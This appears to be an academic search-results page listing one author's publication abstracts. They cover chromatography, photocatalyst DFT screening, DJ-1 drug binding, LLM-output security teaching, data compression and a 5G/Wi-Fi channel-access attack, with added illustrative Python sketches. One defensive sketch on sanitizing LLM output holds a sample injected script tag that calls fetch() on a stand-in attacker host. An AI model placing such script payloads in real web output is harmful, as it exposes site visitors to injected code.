

Search for: All records

Creators/Authors contains: "Rahman, Md"


  1. The analysis of biomolecular interactions is important for characterizing and understanding many fundamental processes that occur in the body and in other biological systems. A variety of methods are available for studying the extent and rate of binding in these interactions. Some of these techniques are homogeneous methods, in which all interacting components are present in the solution phase, while others are heterogeneous, involving both solution-phase and solid-phase components. Liquid chromatography (LC) and high-performance liquid chromatography (HPLC) have often been used to study biomolecular processes. Although these chromatographic methods make use of both a liquid phase (i.e., the mobile phase and applied samples) and a solid phase (the stationary phase and support), they can be used to study solution-phase interactions. This review examines several strategies that have been developed and employed to use LC and HPLC for this purpose. These strategies include the Hummel-Dreyer method, solution-phase frontal analysis, and the physical entrapment of a soluble component of a biomolecular interaction. Other strategies that are discussed are those in which the stationary phase of the column is used as a secondary component or capture agent when studying a solution-phase interaction, as occurs in normal-role affinity chromatography and ultrafast affinity extraction. The general principles of each of these strategies are considered, along with their advantages, potential limitations, and applications (the retention-binding relationship these methods build on is sketched after this entry).
    Free, publicly-accessible full text available March 1, 2026
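
    A minimal sketch, not taken from the review itself, of the zonal-elution relationship that links chromatographic retention to solution binding, k = Ka * mL / VM; the column parameters used below are hypothetical placeholders.

      # Zonal-elution relationship in affinity chromatography: k = Ka * mL / VM,
      # where k is the retention factor, Ka the association constant (M^-1),
      # mL the moles of active binding sites, and VM the column void volume (L).
      # All numbers below are hypothetical.

      def association_constant(k: float, mL: float, VM: float) -> float:
          """Estimate Ka (M^-1) from a measured retention factor."""
          return k * VM / mL

      # Example: k = 10 on a column with 1.0e-9 mol of sites and a 50 uL void volume.
      Ka = association_constant(k=10.0, mL=1.0e-9, VM=50e-6)
      print(f"Ka ~ {Ka:.2e} M^-1 (Kd ~ {1 / Ka:.2e} M)")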
  2. In recent years, ZnIn2S4 (ZIS) has garnered attention as a promising photocatalyst due to its attractive properties. However, its performance is hindered by its limited range of visible-light absorption and the rapid recombination of photoinduced electrons and holes. Single-atom co-catalysts (SACs) can improve photocatalytic activity by providing highly active sites for reactions, enhancing charge-separation efficiency, and reducing the recombination rate of photogenerated carriers. In this work, we perform high-throughput density functional theory (DFT) computations to search for SACs in ZIS spanning the 3d, 4d, and 5d transition metals as well as the lanthanides, considering both substitutional and interstitial sites. For a total of 172 SACs, the defect formation energy (DFE) is computed as a function of chemical potential, charge, and Fermi level (EF), leading to the identification of low-energy dopants and their corresponding shallow or deep defect levels (the DFE expression is sketched after this entry). Statistical analysis of the data shows that the DFE is most strongly correlated with the difference in electron affinity between the host atom (Zn/In/S) and the SAC, followed by electronegativity and boiling point. Among the 60 lowest-energy SACs, Co_In, Yb_i, Tc_Zn, Au_S, La_i, Eu_i, Au_i, Ta_In, Hf_In, Zr_In, and Ni_Zn lower the Gibbs free energy of the hydrogen evolution reaction, improving upon previous ZIS results. The computational dataset and insights from this work promise to accelerate the experimental design of novel dopants in ZIS with optimized properties for photocatalysis and environmental remediation.
    Free, publicly-accessible full text available October 28, 2025
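
    A minimal sketch, not the authors' code, of the standard defect formation energy expression such high-throughput screens evaluate; every energy value below is a hypothetical placeholder.

      # DFE(q, EF) = E_def(q) - E_host - sum_i(n_i * mu_i) + q * (EF + E_VBM) + E_corr

      def dfe(E_def_q: float, E_host: float, dn_mu: float, q: int,
              EF: float, E_vbm: float = 0.0, E_corr: float = 0.0) -> float:
          """Formation energy (eV) of a defect in charge state q at Fermi level EF
          (EF referenced to the valence-band maximum); dn_mu collects n_i * mu_i."""
          return E_def_q - E_host - dn_mu + q * (EF + E_vbm) + E_corr

      # Hypothetical total energies per charge state, scanned across an assumed
      # ~2.4 eV gap; keeping the lowest-energy charge state at each EF gives the
      # usual DFE-vs-EF plot from which shallow/deep levels are read off.
      E_def = {-1: -1049.7, 0: -1050.0, 1: -1050.3}
      for EF in (0.0, 0.6, 1.2, 1.8, 2.4):
          energy, q = min((dfe(E_def[q], E_host=-1052.0, dn_mu=-1.5, q=q, EF=EF), q)
                          for q in (-1, 0, 1))
          print(f"EF = {EF:.1f} eV -> DFE = {energy:.2f} eV (charge state {q:+d})")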
  3. Background: DJ-1 is a protein whose mutation causes rare heritable forms of Parkinson's disease (PD) and is of interest as a target for treating PD and other disorders. This work used high-performance affinity microcolumns to screen and examine the binding of small molecules to DJ-1, as could be used to develop new therapeutics or to study the role of DJ-1 in PD. Non-covalent entrapment was used to place microgram quantities of DJ-1, in an unmodified form, within microcolumns, which were then used in multiple studies to analyze the binding of model compounds and possible drug candidates to DJ-1. Results: Several factors were examined in optimizing the entrapment method, including the addition of a reducing agent to maintain a reduced active-site cysteine residue in DJ-1, the concentration of DJ-1 employed, and the entrapment times. Isatin was used as a known binding agent (dissociation constant, ~2.0 µM) and probe for DJ-1 activity. This compound gave good retention on 2.0 cm × 2.1 mm inner diameter DJ-1 microcolumns made under the final entrapment conditions, with a typical retention factor of 14 and elution in ~8 min at 0.50 mL/min (the conversion from retention to an estimated dissociation constant is sketched after this entry). These DJ-1 microcolumns were used to evaluate the binding of small molecules that were selected in silico to bind or not to bind DJ-1. A compound predicted to bind DJ-1 well gave a retention factor of 122, an elution time of ~15 min at 0.50 mL/min, and an estimated dissociation constant for this protein of 0.5 µM. Significance: These chromatographic tools can be used in future work to screen additional possible binding agents for DJ-1 or adapted to examine drug candidates for other proteins. This work represents the first time protein entrapment has been applied to DJ-1, and it provides the first experimental confirmation of binding to DJ-1 by a small lead compound selected in silico.
    Free, publicly-accessible full text available January 1, 2026
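
    A minimal sketch of how a retention factor and an estimated dissociation constant relate under a 1:1 binding model; the void time, moles of binding sites, and void volume below are assumed values, not ones reported in the paper.

      # k = (tR - tM) / tM from the elution time tR and void time tM; under a
      # 1:1 model, Kd = mL / (k * VM) for mL moles of active entrapped protein
      # and void volume VM. All numeric inputs here are hypothetical.

      def retention_factor(tR: float, tM: float) -> float:
          return (tR - tM) / tM

      def dissociation_constant(k: float, mL: float, VM: float) -> float:
          return mL / (k * VM)

      k = retention_factor(tR=8.0, tM=0.53)  # minutes; tM is an assumed void time
      Kd = dissociation_constant(k, mL=1.0e-9, VM=50e-6)
      print(f"k ~ {k:.1f}, Kd ~ {Kd:.2e} M")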
  4. Free, publicly-accessible full text available October 1, 2025
  5. Large Language Models (LLMs) can produce impressive output, and people increasingly rely on them because they are easy to access and deliver rapid, high-quality results. However, using these results without appropriate scrutiny poses serious security risks, particularly when they are integrated with other software, APIs, or plugins, because LLM outputs depend heavily on the prompts they receive. It is therefore essential to carefully sanitize these outputs before using them in other software environments. This paper is designed to teach students about the potential dangers of contaminated LLM output in the context of web development through prelab, hands-on, and postlab experiences. The hands-on lab provides practical guidance on handling LLM vulnerabilities to make applications safe, with real-world examples in Python (an illustrative sketch follows this entry). This approach aims to give students a deeper understanding of the precautions necessary to secure software against the vulnerabilities introduced by LLM output.
    Free, publicly-accessible full text available July 2, 2025
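
    An illustration of the kind of output sanitization the lab teaches; this sketch is ours, not the paper's lab material. LLM text bound for a web page is treated like any other untrusted input and escaped before it reaches the browser.

      import html

      def render_llm_output(raw: str) -> str:
          """Escape LLM-generated text so injected markup is displayed, not executed."""
          return html.escape(raw)

      # Example: a prompt-injected response trying to smuggle in a script tag.
      malicious = 'Here is your summary.<script>fetch("https://evil.example/x")</script>'
      print(render_llm_output(malicious))
      # -> the <script> element is rendered as inert text instead of running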
  6. Large Language Models (LLMs) can produce impressive output, and people increasingly rely on them because they are easy to access and deliver rapid, high-quality results. However, using these results without appropriate scrutiny poses serious security risks, particularly when they are integrated with other software, APIs, or plugins, because LLM outputs depend heavily on the prompts they receive. It is therefore essential to carefully sanitize these outputs before using them in other software environments. This paper is designed to teach students about the potential dangers of contaminated LLM output in the context of web development through prelab, hands-on, and postlab experiences. The hands-on lab provides practical guidance on handling LLM vulnerabilities to make applications safe, with real-world examples in Python (a complementary sketch follows this entry). This approach aims to give students a deeper understanding of the precautions necessary to secure software against the vulnerabilities introduced by LLM output.
    Free, publicly-accessible full text available July 2, 2025
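
    A complementary sketch on the same theme, again ours rather than the paper's, with assumed field names: when LLM output drives an API or plugin rather than a page, validate its structure against an allowlist before acting on it.

      import json

      ALLOWED_ACTIONS = {"search", "summarize"}  # hypothetical allowlist

      def parse_llm_command(raw: str) -> dict:
          """Accept only well-formed JSON with an allowlisted action field."""
          try:
              cmd = json.loads(raw)
          except json.JSONDecodeError:
              raise ValueError("LLM output is not valid JSON; refusing to execute")
          if cmd.get("action") not in ALLOWED_ACTIONS:
              raise ValueError(f"disallowed action: {cmd.get('action')!r}")
          return {"action": cmd["action"], "query": str(cmd.get("query", ""))}

      print(parse_llm_command('{"action": "search", "query": "HPLC"}'))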
  7. Free, publicly-accessible full text available July 2, 2025
  8. Scientific simulations running on HPC facilities generate massive amounts of data, putting significant pressure on supercomputers' storage capacity and network bandwidth. To alleviate this problem, a rich body of work has focused on reducing data volumes via error-controlled lossy compression. However, fixed-ratio compression is not well supported, preventing users from appropriately allocating memory or storage space, or from knowing the data transfer time over the network in advance. To address this problem, recent ratio-controlled frameworks, such as FXRZ, have incorporated methods to predict the error-bound settings required to reach a user-specified compression ratio. However, these approaches fail to achieve fixed-ratio compression in an accurate, efficient, and scalable fashion across diverse datasets and compression algorithms. This work proposes an efficient, scalable, ratio-controlled lossy compression framework (CAROL). At the core of CAROL are four optimization strategies that improve prediction accuracy and runtime efficiency over state-of-the-art solutions. First, CAROL uses surrogate-based compression-ratio estimation to generate training data. Second, it includes a novel calibration method to improve prediction accuracy across a variety of compressors. Third, it leverages Bayesian optimization for efficient training and incremental model refinement. Fourth, it uses GPU acceleration to speed up prediction (the basic ratio-to-error-bound prediction idea is sketched after this entry). We evaluate CAROL on four compression algorithms and six scientific datasets. On average, compared to the state-of-the-art FXRZ framework, CAROL achieves a 4× speedup in setup time and a 36× speedup in inference time while maintaining less than 1% difference in estimation accuracy.
    Free, publicly-accessible full text available August 12, 2025
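
    A minimal sketch of the ratio-control idea, not CAROL's actual predictor: sample a compressor at a few error bounds, then interpolate in log-log space to predict the bound that achieves a requested ratio. The sample points below are hypothetical.

      import numpy as np

      # (error bound, measured compression ratio) pairs from a few trial runs.
      samples = [(1e-5, 4.2), (1e-4, 9.8), (1e-3, 23.0), (1e-2, 61.0)]

      def predict_error_bound(target_ratio: float) -> float:
          """Interpolate log(error bound) as a function of log(compression ratio)."""
          bounds, ratios = zip(*samples)
          return float(np.exp(np.interp(np.log(target_ratio),
                                        np.log(ratios), np.log(bounds))))

      eb = predict_error_bound(target_ratio=30.0)
      print(f"predicted error bound for a 30:1 ratio ~ {eb:.2e}")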
  9. Free, publicly-accessible full text available June 17, 2025
  10. Spectrum coexistence between 5G and Wi-Fi in the coveted 5 GHz band opens new possibilities for more effective spectrum utilization. While the Listen-Before-Talk channel access mechanism with self-deferral improves the relative fairness of this coexistence framework, it introduces new vulnerabilities that have yet to be addressed. This work presents a novel attack, Random Channel Access Deterrence (RanCAD), that exploits a previously unreported vulnerability in the channel access mechanism. In the proposed attack, a malicious access point deceives a victim 5G base station into deferring its access to the shared channel, resulting in higher channel access delay and lower spectrum utilization. In addition, we propose a discrete-time Markov chain (DTMC) model to study the proposed attack and illustrate its impact on the victim's performance (a toy DTMC of this kind is sketched after this entry). To our knowledge, this is the first work to identify this vulnerability in the channel access mechanism of coexisting 5G and Wi-Fi networks in the 5 GHz band.
    Free, publicly-accessible full text available June 9, 2025
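
    A toy DTMC sketch, not the paper's model; the states and transition probabilities are invented. It shows how a stationary distribution quantifies the long-run time a victim loses to attacker-induced deferral.

      import numpy as np

      # States: 0 = transmit, 1 = defer (channel sensed busy), 2 = backoff.
      # Rows are current states; each row sums to 1.
      P = np.array([[0.6, 0.3, 0.1],
                    [0.2, 0.5, 0.3],
                    [0.5, 0.2, 0.3]])

      # The stationary distribution pi solves pi P = pi with sum(pi) = 1;
      # stack the normalization row and solve in the least-squares sense.
      A = np.vstack([P.T - np.eye(3), np.ones(3)])
      b = np.array([0.0, 0.0, 0.0, 1.0])
      pi, *_ = np.linalg.lstsq(A, b, rcond=None)

      print(f"long-run fraction of slots spent transmitting: {pi[0]:.3f}")
      print(f"fraction lost to attacker-induced deferral:    {pi[1]:.3f}")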